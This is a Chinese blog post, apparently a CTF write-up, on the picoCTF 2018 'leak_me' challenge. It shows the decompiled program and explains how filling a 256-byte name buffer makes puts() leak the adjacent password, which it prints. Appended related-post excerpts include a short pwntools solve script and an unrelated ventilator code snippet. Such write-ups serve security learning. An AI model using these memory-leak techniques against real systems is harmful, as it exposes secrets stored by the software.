picoctf_2018_leak_me

原创 于 2023-09-20 09:28:01 发布 · 184 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

文章描述了一个在PicoCTF比赛中的32位程序,具有NX保护但无PIE。利用puts的特性,通过输入特殊字符序列获取密码,实现本地shell。漏洞利用方法包括输入0x100字节覆盖变量并提取敏感信息。

picoctf_2018_leak_me

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位,只开了NX

// bad sp value at call has been detected, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s1[64]; // [esp+0h] [ebp-194h] BYREF
  char v5[256]; // [esp+40h] [ebp-154h] BYREF
  char s[64]; // [esp+140h] [ebp-54h] BYREF
  FILE *stream; // [esp+180h] [ebp-14h]
  char *v8; // [esp+184h] [ebp-10h]
  __gid_t v9; // [esp+188h] [ebp-Ch]
  int *p_argc; // [esp+18Ch] [ebp-8h]

  p_argc = &argc;
  setvbuf(stdout, 0, 2, 0);
  v9 = getegid();
  setresgid(v9, v9, v9);
  memset(s, 0, sizeof(s));
  memset(v5, 0, sizeof(v5));
  memset(s1, 0, sizeof(s1));
  puts("What is your name?");
  fgets(v5, 0x100, stdin);
  v8 = strchr(v5, 10);
  if ( v8 )
    *v8 = 0;
  strcat(v5, ",\nPlease Enter the Password.");
  stream = fopen("password.txt", "r");
  if ( !stream )
  {
    puts(
      "Password File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
    exit(0);
  }
  fgets(s, 64, stream);
  printf("Hello ");
  puts(v5);
  fgets(s1, 0x40, stdin);
  v5[0] = 0;
  if ( !strcmp(s1, s) )
    flag();
  else
    puts("Incorrect Password!");
  return 0;
}

有个后门,只要我们输入正确的密码就getshell了

看我们输入的点,v5和s的位置

char v5[256]; // [esp+40h] [ebp-154h] BYREF
char s[64]; // [esp+140h] [ebp-54h] BYREF

这两个是紧挨着的并且password是读入到s的

思路

利用puts的特性,遇到\x00截断才终止输出,我们输入是0x100个字节,就可以把s后面的内容输出出来了

exp:

b'a'*0x100进去
得到a_reAllY_s3cuRe_p4s$word_f85406
这个就是密码

在这里插入图片描述

[BUUCTF]PWN——picoctf_2018_leak_me(puts的‘\x00’绕过输出敏感数据)
mcmuyanga的博客
02-02 532
picoctf_2018_leak_me 附件 步骤 例行检查,32位,开启了nx保护 本地运行看一下大概的情况 32位ida载入 程序执行的大概流程就是先输入name,然后输入password,靶机上应该会有一个password.txt去检测是否输入是否正确,输入正确,就会调用flag函数,flag函数回将flag打印出来 参数v5(存放name)和参数s(存放flag)在栈上的位置相差不远,而且给参数v5读入数据的时候可以覆盖道参数s 他们相差0x154-0x54=0x100,而且我们对v
攻防世界--simple-check-100
qq_48274326的博客
01-02 823
攻防世界–simple-check-100 ida找到main函数 // bad sp value at call has been detected, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { void *v3; // esp int v5; // [esp-14h] [ebp-50h] int v6; // [esp-10h] [ebp-4Ch]
BUUCTF(pwn) picoctf_2018_leak_me
半岛铁盒的博客
04-06 424
这题难度不大,分析好流程就可以; name,与密码 是紧挨着的,相差0x100,即256 我们可以利用puts() 进行溢出泄漏密码; 因为 puts() 函数输出遇到\x00停止; from pwn import * p = remote(“node3.buuoj.cn”,27388) p.sendline(‘a’) p.recv() p.sendline(‘a_reAllY_s3cuRe_p4s$word_f85406’) p.interactive() ...
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 794
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
buuctf ciscn_2019_final_5 calloc整理机制修改tcache的fd puts \0泄漏 signal信号
carol2358的博客
08-14 655
ciscn_2019_final_5 有趣的题目 涉及位级操作 漏洞的关键是index为16时,二进制为1 0000 edit 他们都是认heap_ptr里最后一个16进制来判断他是index几的,index1最后一位就是1,2就是2,8就是8,4就是4,但问题是他存储是按照你申请的顺序存的,和这个index没啥关系,漏洞就来了 这题很明显是要你改got表 没有show,就把free改成puts来泄漏 exp: from pwn import * from LibcSearcher import ...
picoCTF2022】Pwn部分
Sparks_Pion的博客
03-29 896
basic-file-exploit if ((entry_number = strtol(entry, NULL, 10)) == 0) { puts(flag); fseek(stdin, 0, SEEK_END); exit(0); } 查询 0 号就可以了 ┌──(root㉿LAPTOP-Sparks)-[/tmp] └─# nc saturn.picoctf.net 52682 Hi, welcome to my echo chamber! Type '1' to ent
buuctf-pwn write-ups (11)
CoLin的pwn小屋
03-06 776
buuctf write-ups
[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)
Y_peak的博客
03-29 470
[BUUCTF-pwn]——picoctf_2018_leak_me 题目没什么难度,但是可能反汇编的时候你们可能会出现一些问题。 peak小知识 pwn题,有时会碰到无法反汇编的情况,大多数情况下,都是call的位置报错,双击函数,按F5人为给它反汇编,再返回就可以了。不过有时候,是IDA栈指针的问题,大多数还是前者居多。 思路 在IDA中,v6代表name s是password.距离0x100也就是256。 输入256个字符后,我们可以直接将password泄露出来。这样我们就可以在下面调用flag函
非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me
PLpa的博客
08-04 589
前言: 对于这种非常规的栈溢出题目,我自己也是见的比较少,故写此博客记录一下。 解题思路 查看保护 只开了NX保护的32位程序,如果是常规题的话,应该是非常容易做的。 进入IDA查看伪代码 打开IDA,如果是第一次见这种题目就会傻眼了。 题目中的每一个函数都好像是自己写的,那么我们就不能利用got表来泄露函数地址来getshell了。 题目开了NX保护,我们不能写shellcode,常规的ROP又利用不了,我们就完全利用不了libc里边的函数了。 乍一看,好像没什么办法了,但是我们可以用程序中非常多的g
PicoCTF_2018_are_you_root(未初始化验证漏洞)
seaaseesa的博客
04-17 954
PicoCTF_2018_are_you_root 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。 Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符...
IDA无法反编译 and 提示错误
weixin_52369224的博客
11-01 7510
情况一: 有的时候IDA的函数点进去 ,发现无法去反编译,可能是代码出问题了,考察我们对汇编的阅读 能力例如下面: aaa指令明显错误(注:CODE CREF代码交叉引用)我们把这里jbe和aaa nop掉 然后再选中红色部分,按p键定义为函数,然后重新反编译即可 ...
picoCTF,Reverse Engineering,逆向类,42/55
Allezima阿力代码
02-10 2610
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
picoCTF2023_补题
xiaoxiaoZ_L的博客
04-04 518
补题
buu-[网鼎杯 2020 青龙组]jocker
m0_73393932的博客
05-31 1435
逆向
picoCTF2022】Crypto部分
Sparks_Pion的博客
03-27 1542
basic-mod1 str = '128 63 242 87 151 147 50 369 239 248 205 346 299 73 335 189 105 293 37 214 333 137' d = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_' print(''.join([d[int(x) % 37] for x in str.split(' ')])) basic-mod2 from gmpy2 import * from sympy import inv
[网鼎杯 2020 青龙组]jocker
yidalipao1的博客
05-27 758
[网鼎杯 2020 青龙组]jocker SMC(self-Modifying Code): 自修改代码,程序在执行某段代码的过程中会对程序的代码进行修改,只有在修改后的代码才是可汇编,可执行的。在程序未对该段代码进行修改之前,在静态分析状态下,均是不可读的字节码。 查壳:32位无壳程序,直接拖ida 首先shift+f12搜索字符串,但是除了main函数中的一句请输入flag提示之外在没有什么有用的。 main函数 // positive sp value has been detecte
float ven_leak_cal(float estimate_leak, float flow, unsigned char reset) { float leak = 0; static float m_flow_estimate_leak_dc = 0; static float m_flow_dc = 0; static float m_flow_estimate_leak_error = 0; static float m_flow_estimate_leak_error_filted = 0; if (reset == 1) {//初始化 ven_leak_cal_estimate_leak_filter_lp(estimate_leak, 1); //全部给零了 ven_leak_cal_error_filter_lp(m_flow_estimate_leak_error, 1);//全部给零了 ven_leak_cal_flow_filter_lp(flow, 1); //全部给零了 leak = estimate_leak; m_flow_estimate_leak_dc = 0; m_flow_dc = 0; m_flow_estimate_leak_error = 0; } else { //提取预估流量低通信号 m_flow_estimate_leak_dc = ven_leak_cal_estimate_leak_filter_lp(estimate_leak, 0); //防止计算错误 m_flow_estimate_leak_dc = (m_flow_estimate_leak_dc <= 0.1f) ? 0.1f : m_flow_estimate_leak_dc;//24.6.24 ty //提取通气流量低通信号 m_flow_dc = ven_leak_cal_flow_filter_lp(flow, 0); /* 2024.05.17 Changed by Chaoqi,There are smoe suitations flow will be zero ,so make estimate leak flow DC as denominator. */ //计算误差 // m_flow_estimate_leak_error = m_flow_estimate_leak_dc / m_flow_dc; m_flow_estimate_leak_error = m_flow_dc / m_flow_estimate_leak_dc; //误差滤波 m_flow_estimate_leak_error_filted = ven_leak_cal_error_filter_lp(m_flow_estimate_leak_error, 0);//对误差进行滤波,得到滤波后的误差,同上 /* 2024.05.17 Changed by Chaoqi, */ //通过误差反推漏气量 // leak = estimate_leak / m_flow_estimate_leak_error_filted; leak = estimate_leak * m_flow_estimate_leak_error_filted; } return leak; }
最新发布
11-06
你提供的函数 `ven_leak_cal` 是呼吸机中用于**实时估算面罩泄漏流量(Mask Leak Flow)**的核心模块之一。它通过比较“预估泄漏流量”和“实际测量总流量”,动态修正泄漏模型,从而提高自主呼吸检测、潮气量计算和...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值